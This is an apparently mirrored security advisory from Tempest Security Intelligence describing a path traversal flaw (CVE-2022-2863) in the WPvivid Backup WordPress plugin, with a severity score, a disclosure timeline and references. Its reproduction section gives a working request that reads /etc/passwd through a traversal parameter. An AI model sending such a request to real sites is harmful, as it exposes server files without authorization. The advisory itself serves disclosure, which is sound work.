Share
## https://sploitus.com/exploit?id=PACKETSTORM:168616
=====[ Tempest Security Intelligence - ADV-15/2022  
]==========================  
  
Wordpress plugin - WPvivid Backup - Version < 0.9.76  
  
Author: Rodolfo Tavares  
  
Tempest Security Intelligence - Recife, Pernambuco - Brazil  
  
=====[ Table of Contents]==================================================  
* Overview  
* Detailed description  
* Timeline of disclosure  
* Thanks & Acknowledgements  
* References  
  
=====[ Vulnerability  
Information]=============================================  
* Class: Improper Limitation of a Pathname to a Restricted Directory  
('Path Traversal')  
('Path Traversal') [CWE-22]  
  
* CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H  
* CVSS Base Score 7.2  
  
=====[ Overview]========================================================  
* System affected : Wordpress plugin - WPvivid Backup  
* Software Version : Version < 0.9.76  
* Impacts : The plugin WPvivid Backup does not sanitise and validate a  
parameter before using it to read the content of a file, allowing high  
privilege users to read any file from the web server via a Traversal attack.  
  
=====[ Detailed  
description]=================================================  
* Steps to reproduce  
  
1 - Authenticated as privilege user, copy the request below, change the  
placeholder {{nonce}} with a valid nonce:  
```  
  
https://example.com/wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922  
```  
  
=====[ Timeline of  
disclosure]===============================================  
  
11/Aug/2022 - Responsible disclosure was initiated with the vendor.  
15/Aug/2022 - WPvivid Support confirmed the issue.  
16/Aug/2022 - WPvivid Support fix the issue.  
08/Aug/2022 - CVEs was assigned and reserved as CVE-2022-2863.  
  
=====[ Thanks & Acknowledgements]========================================  
* Tempest Security Intelligence [5]  
  
=====[ References ]=====================================================  
  
[1][ [  
https://cwe.mitre.org/data/definitions/22.html]|https://cwe.mitre.org/data/definitions/22.html  
]]  
[2][ [  
https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a]|https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a  
[3][ [https://www.tempest.com.br|https://www.tempest.com.br/]]  
[4][ [  
https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]|https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]]  
]  
[5][ [Thanks FXO,ACPM,MFPP]]  
  
=====[ EOF ]===========================================================  
--